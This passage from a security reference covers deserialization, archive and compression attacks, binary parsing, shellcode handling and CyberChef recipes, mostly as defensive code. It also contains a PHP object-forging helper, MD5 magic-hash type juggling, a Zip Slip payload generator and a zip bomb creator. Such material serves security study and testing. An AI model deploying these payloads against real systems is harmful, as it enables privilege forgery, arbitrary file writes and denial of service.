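The substring heuristic above flags any payload that merely contains bytes such as `os` (for example the word "position"). A more precise, still static, check is to walk the opcode stream with `pickletools.genops`, which parses the pickle without executing it. A minimal sketch; `pickle_imports_code` is a hypothetical name:

```python
import pickle
import pickletools

# Opcodes that resolve a module attribute (a class or callable) by name
IMPORT_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST"}


def pickle_imports_code(data: bytes) -> bool:
    """True if the stream would import any global when loaded."""
    return any(op.name in IMPORT_OPCODES
               for op, _arg, _pos in pickletools.genops(data))
```

Plain containers of strings and numbers never need these opcodes, so a hit means the pickle references some class or function. Legitimate pickles of custom objects trigger it too, so treat the result as a triage signal rather than a verdict.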
# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, sign the data with HMAC when serializing and verify the signature before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
data = pickle.dumps(obj)
sig = hmac.new(key, data, hashlib.sha256).digest()
return data, sig
def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
expected = hmac.new(key, data, hashlib.sha256).digest()
if not hmac.compare_digest(sig, expected):
raise ValueError("Pickle signature verification failed")
return pickle.loads(data)
PHP serialize/unserialize
# PHP serialization format:
# s:5:"hello"; -> string(5) "hello"
# i:42; -> int 42
# b:1; -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;} -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";} -> User object
# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods
# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    # PHP's length prefix counts bytes, not characters
    return f's:{len(s.encode())}:"{s}";'
def php_serialize_object(class_name: str, properties: dict) -> str:
props = ''
for key, value in properties.items():
props += php_serialize_string(key)
if isinstance(value, str):
props += php_serialize_string(value)
elif isinstance(value, int):
props += f'i:{value};'
return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{props}}}'
# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}
# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison
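The "magic hash" condition is easy to test for: the hex digest must be `0e` followed only by decimal digits, so PHP's loose comparison reads it as a float equal to zero. A small sketch of that check (`is_magic_hash` and `md5_is_magic` are illustrative names):

```python
import hashlib
import re

# "0e" followed only by decimal digits parses as 0 * 10^n in PHP
MAGIC_HASH = re.compile(r'0e\d+')


def is_magic_hash(hex_digest: str) -> bool:
    return MAGIC_HASH.fullmatch(hex_digest) is not None


def md5_is_magic(value: str) -> bool:
    return is_magic_hash(hashlib.md5(value.encode()).hexdigest())
```

Finding new inputs means brute-forcing candidates through a check like this; the defense is strict comparison (`===` or `hash_equals()`).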
13. Compression Security
gzip analysis
import gzip
import struct
# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)
# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
if data[:2] != b'\x1f\x8b':
raise ValueError("Not a gzip file")
method = data[2] # 8 = deflate
flags = data[3]
mtime = struct.unpack('<I', data[4:8])[0]
return {
'magic': data[:2].hex(),
'method': 'deflate' if method == 8 else f'unknown({method})',
'flags': f'{flags:08b}',
'ftext': bool(flags & 1),
'fhcrc': bool(flags & 2),
'fextra': bool(flags & 4),
'fname': bool(flags & 8),
'fcomment': bool(flags & 16),
'mtime': mtime,
}
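`gzip.decompress()` inflates the whole stream into memory, which is exactly what a decompression bomb exploits. A bounded alternative is `zlib.decompressobj` with a `max_length` cap. The following is a sketch; `bounded_gunzip` and its default limit are assumptions, and only the first gzip member is handled.

```python
import gzip
import zlib


def bounded_gunzip(data: bytes, limit: int = 10_000_000) -> bytes:
    """Decompress gzip data, refusing to produce more than `limit` bytes."""
    # wbits = MAX_WBITS | 16 tells zlib to expect a gzip header and trailer
    inflater = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)
    # Ask for one byte more than allowed so an overrun can be detected
    out = inflater.decompress(data, limit + 1)
    if len(out) > limit:
        raise ValueError(f"decompressed size exceeds {limit} bytes")
    return out


if __name__ == "__main__":
    small = gzip.compress(b"A" * 1000)
    print(len(bounded_gunzip(small, limit=10_000)))
```

Input that was not consumed because of the cap stays in `inflater.unconsumed_tail`, so memory use is bounded by `limit` rather than by the attacker's payload.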
# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz # list compression ratio
gzip -d -c suspicious.gz # decompress to stdout
zcat suspicious.gz # same as above
# Detect gzip by magic bytes
xxd suspicious.bin | head -1 # look for 1f8b
ZIP analysis and attacks
import zipfile
import os
# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
for info in zf.infolist():
print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
f"{'encrypted' if info.flag_bits & 0x1 else ''}")
# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory
def safe_extract(zip_path: str, dest: str) -> None:
"""Extract ZIP safely, preventing path traversal."""
dest = os.path.realpath(dest)
with zipfile.ZipFile(zip_path, 'r') as zf:
for member in zf.infolist():
member_path = os.path.realpath(os.path.join(dest, member.filename))
if not member_path.startswith(dest + os.sep) and member_path != dest:
raise ValueError(f"Path traversal detected: {member.filename}")
zf.extract(member, dest)
# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
dangerous = []
with zipfile.ZipFile(zip_path, 'r') as zf:
for name in zf.namelist():
if name.startswith('/') or '..' in name:
dangerous.append(name)
return dangerous
# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
"""Create a ZIP with path traversal payload. Authorized testing only."""
with zipfile.ZipFile(output, 'w') as zf:
zf.writestr(target_path, content)
# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')
ZIP bomb (decompression bomb)
# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:
def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
size_threshold: int = 1_000_000_000) -> bool:
"""Detect potential ZIP bomb by compression ratio."""
with zipfile.ZipFile(zip_path, 'r') as zf:
for info in zf.infolist():
if info.compress_size > 0:
ratio = info.file_size / info.compress_size
if ratio > ratio_threshold or info.file_size > size_threshold:
return True
elif info.file_size > 0:
return True # zero compressed size but non-zero file size
return False
# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
"""Create a single-layer zip bomb. Testing only."""
with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
# Highly compressible data
zf.writestr('bomb.txt', b'\x00' * uncompressed_size)
tar analysis and attacks
# List tar contents (check for path traversal); use -t without -v so each line starts with the member path
tar -tf archive.tar | grep -E '(^|/)\.\.(/|$)|^/'
# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/
# Check for symlink attacks
tar -tvf archive.tar | grep '^l'
import tarfile
# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
issues = []
with tarfile.open(tar_path) as tf:
for member in tf.getmembers():
# Path traversal
if member.name.startswith('/') or '..' in member.name:
issues.append(f"PATH_TRAVERSAL: {member.name}")
# Symlink outside extraction directory
if member.issym() or member.islnk():
issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
# Setuid/setgid bits
if member.mode & 0o4000 or member.mode & 0o2000:
issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
# Device files
if member.isdev():
issues.append(f"DEVICE_FILE: {member.name}")
return issues
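# Safe extraction: the filter parameter (Python 3.12+, also backported to 3.11.4, 3.10.12, 3.9.17, 3.8.17)
# tarfile.open(path).extractall(dest, filter='data') # rejects absolute paths, traversal, links outside dest, device files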
14. Binary & Struct Manipulation
struct packing and unpacking
import struct
# Format characters:
# < little-endian > big-endian ! network (big-endian) = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f float (4) d double (8)
# s char[] (bytes) p pascal string
# x padding byte
# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex()) # efbeadde34127856 (little-endian)
# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values]) # ['0xdeadbeef', '0x1234', '0x5678']
# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1") # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0] # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int)) # '192.168.1.1'
# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)
# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")
Endianness
# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)
value = 0xdeadbeef
# Manual conversion
le_bytes = value.to_bytes(4, 'little') # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big') # b'\xde\xad\xbe\xef'
# Swap endianness
def swap_endian_32(val: int) -> int:
return struct.unpack('<I', struct.pack('>I', val))[0]
def swap_endian_16(val: int) -> int:
return struct.unpack('<H', struct.pack('>H', val))[0]
# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
"""Check if value at offset matches expected in LE or BE."""
le_val = struct.unpack_from('<I', data, offset)[0]
be_val = struct.unpack_from('>I', data, offset)[0]
if le_val == expected:
return 'little-endian'
elif be_val == expected:
return 'big-endian'
return 'unknown'
# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little') # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big') # 0xdeadbeef
ELF header parsing
import struct
from collections import namedtuple
def parse_elf_header(data: bytes) -> dict:
"""Parse ELF file header."""
if data[:4] != b'\x7fELF':
raise ValueError("Not an ELF file")
ei_class = data[4] # 1=32-bit, 2=64-bit
ei_data = data[5] # 1=LE, 2=BE
ei_version = data[6] # 1=current
ei_osabi = data[7] # 0=SYSV, 3=Linux, etc.
endian = '<' if ei_data == 1 else '>'
bits = 32 if ei_class == 1 else 64
if bits == 64:
# e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
# e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
# e_shnum(2) e_shstrndx(2)
fmt = f'{endian}HHIQQQIHHHHHH'
fields = struct.unpack_from(fmt, data, 16)
e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
else:
fmt = f'{endian}HHIIIIIHHHHHH'
fields = struct.unpack_from(fmt, data, 16)
e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
0x08: 'MIPS', 0xF3: 'RISC-V'}
return {
'class': f'{bits}-bit',
'endian': 'little' if ei_data == 1 else 'big',
'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
'entry_point': f'0x{e_entry:x}',
'ph_offset': e_phoff,
'ph_count': e_phnum,
'sh_offset': e_shoff,
'sh_count': e_shnum,
}
# Usage:
# with open('/bin/ls', 'rb') as f:
# info = parse_elf_header(f.read(64))
# for k, v in info.items():
# print(f"{k}: {v}")
# Quick ELF analysis
readelf -h /bin/ls # full header
readelf -l /bin/ls # program headers (segments)
readelf -S /bin/ls # section headers
readelf -d /bin/ls # dynamic section (libraries)
readelf -s /bin/ls # symbol table
objdump -d /bin/ls | head -50 # disassembly
# Check for security features
checksec --file=/bin/ls # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH
PE header parsing
import struct
def parse_pe_header(data: bytes) -> dict:
"""Parse PE (Windows executable) header."""
if data[:2] != b'MZ':
raise ValueError("Not a PE file")
# e_lfanew: offset to PE signature (at offset 0x3C)
pe_offset = struct.unpack_from('<I', data, 0x3C)[0]
if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
raise ValueError("Invalid PE signature")
# COFF header (20 bytes after PE signature)
coff_offset = pe_offset + 4
machine, num_sections, timestamp, sym_table, num_symbols, \
opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)
MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}
# Optional header magic
opt_offset = coff_offset + 20
opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'
# Entry point and image base
if pe_type == 'PE32+':
entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
else:
entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]
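import datetime
try:
# utcfromtimestamp() is deprecated since Python 3.12; use an aware UTC datetime
compile_time = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc).isoformat()
except (OSError, OverflowError, ValueError):
compile_time = f"raw: {timestamp}"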
return {
'type': pe_type,
'machine': MACHINES.get(machine, f'0x{machine:x}'),
'sections': num_sections,
'compile_time': compile_time,
'entry_point_rva': f'0x{entry_rva:x}',
'image_base': f'0x{image_base:x}',
'characteristics': f'0x{characteristics:x}',
'is_dll': bool(characteristics & 0x2000), # IMAGE_FILE_DLL
'is_exe': bool(characteristics & 0x0002) and not (characteristics & 0x2000), # EXECUTABLE_IMAGE is also set for DLLs
}
# Usage:
# with open('malware.exe', 'rb') as f:
# info = parse_pe_header(f.read(1024))
Shellcode extraction and analysis
# Extract shellcode from various formats
def shellcode_from_c_array(c_code: str) -> bytes:
"""Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
import re
hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
return bytes(int(h, 16) for h in hex_vals)
def shellcode_from_escaped(escaped: str) -> bytes:
"""Parse \\x escape format: \\x6a\\x02\\x58"""
import re
hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
return bytes(int(h, 16) for h in hex_vals)
def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
"""Convert bytes to C array format."""
hex_vals = ', '.join(f'0x{b:02x}' for b in data)
return f'unsigned char {var_name}[] = {{{hex_vals}}};'
def shellcode_to_python(data: bytes) -> str:
"""Convert bytes to Python bytes literal."""
return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'
# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
"""Find positions of bad characters in shellcode."""
positions = []
for i, b in enumerate(shellcode):
if b in bad_chars:
positions.append(i)
return positions
# Common bad characters for testing
ALL_BAD_CHARS = bytes(range(256)) # Generate all bytes, test which get mangled
# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'
# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -
# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test
15. CyberChef Reference
CyberChef is a browser-based data manipulation tool — "The Cyber Swiss Army Knife." All operations run client-side; no data leaves the browser. Source: github.com/gchq/CyberChef (34k+ stars).
Key features
| Feature | Description |
|---|---|
| Drag-and-drop recipes | Chain operations visually |
| Auto Bake | Real-time output as input/recipe changes |
| Magic | Auto-detect encoding and suggest decode steps |
| Breakpoints | Step through recipe stages to inspect intermediate data |
| File support | Handle files up to ~2 GB |
| URL sharing | Share complete recipes via URL parameters |
| Client-side | No data sent to any server |
Most-used operations for security work
| Category | Operations |
|---|---|
| Encoding | To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse |
| URL/HTML | URL Encode/Decode, HTML Entity Encode/Decode |
| Crypto | AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere |
| Hashing | MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM |
| Compression | Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib |
| Data format | Parse JSON, XML, CSV, protobuf, MessagePack, BSON |
| Networking | Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP |
| Analysis | Entropy, Frequency distribution, Detect file type, Strings, Hexdump |
| Code | JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1 |
| Visual | Render Image, Play Media, Render Markdown |
| Forensics | Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime |
| Flow | Fork, Merge, Register, Conditional Jump, Label, Comment |
Useful CyberChef recipes (bookmark these)
Decode multi-layer obfuscation:
From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})
Extract IOCs from text:
Extract_IP_addresses -> Defang_IP_Addresses
Decode PowerShell -EncodedCommand:
From_Base64 -> Decode_text('UTF-16LE')
Analyze suspicious file:
Detect_File_Type -> Entropy -> Strings
JWT decode:
JWT_Decode
Timestamp conversion:
From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp
Defang indicators for safe sharing:
Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com
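For scripted pipelines, the same defanging transformation can be approximated in a few lines of Python. This sketch reproduces the output format shown in the comment above (`hxxp[://]evil[.]com`); it is an assumption that this matches CyberChef's default options, and `defang` is a hypothetical helper rather than part of any CyberChef API.

```python
def defang(indicator: str) -> str:
    """Make a URL or IP address non-clickable for safe sharing."""
    scheme, sep, rest = indicator.partition("://")
    if not sep:
        # Bare domain or IP address: only the dots need neutralizing
        return indicator.replace(".", "[.]")
    scheme = scheme.replace("http", "hxxp")
    return f"{scheme}[://]{rest.replace('.', '[.]')}"
```

Dots in the path are bracketed as well, which is harmless for sharing but means a matching "refang" step must undo all three substitutions.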
CyberChef from the command line
# Self-host CyberChef (no external dependencies)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npm install && npx grunt prod
# Open build/prod/index.html in browser — fully offline
# Or use Docker
docker run -p 8080:8080 ghcr.io/gchq/cyberchef:latest
# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64()]);
Appendix: Quick Conversion Table
| From | To | Python | Bash |
|---|---|---|---|
| String | Base64 | base64.b64encode(s.encode()) | echo -n "s" \| base64 |
| Base64 | String | base64.b64decode(b).decode() | echo "b" \| base64 -d |
| String | Hex | s.encode().hex() | echo -n "s" \| xxd -p |
| Hex | String | bytes.fromhex(h).decode() | echo "h" \| xxd -r -p |
| String | URL | quote(s, safe='') | python3 -c "from urllib.parse import quote; print(quote('s',safe=''))" |
| String | HTML | html.escape(s) | python3 -c "import html; print(html.escape('s'))" |
| String | MD5 | hashlib.md5(s.encode()).hexdigest() | echo -n "s" \| md5sum |
| String | SHA256 | hashlib.sha256(s.encode()).hexdigest() | echo -n "s" \| sha256sum |
| String | NTLM | hashlib.new('md4',s.encode('utf-16-le')).hexdigest() | echo -n "s" \| iconv -t utf-16le \| openssl dgst -md4 |
| String | ROT13 | codecs.encode(s, 'rot_13') | echo "s" \| tr 'A-Za-z' 'N-ZA-Mn-za-m' |
| Int | Hex | hex(n) | printf '%x' n |
| Hex | Int | int(h, 16) | echo $((16#h)) |
| Bytes | XOR | bytes(b^k for b in data) | python3 -c "..." |
Appendix: Hash Length Identification
| Length | Possible types | Hashcat mode |
|---|---|---|
| 16 | MySQL 3.x | 200 |
| 32 | MD5, NTLM, MD4 | 0, 1000, 900 |
| 40 | SHA-1 | 100 |
| 56 | SHA-224 | 1300 |
| 64 | SHA-256 | 1400 |
| 96 | SHA-384 | 10800 |
| 128 | SHA-512 | 1700 |
| 32:32 | NetNTLMv1 | 5500 |
| variable | NetNTLMv2 | 5600 |
| 13 | DES crypt | 1500 |
| 34 | MD5 crypt ($1$) | 500 |
| 60 | bcrypt ($2a$) | 3200 |
| 43 | SHA-256 crypt ($5$) | 7400 |
| 86 | SHA-512 crypt ($6$) | 1800 |
Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.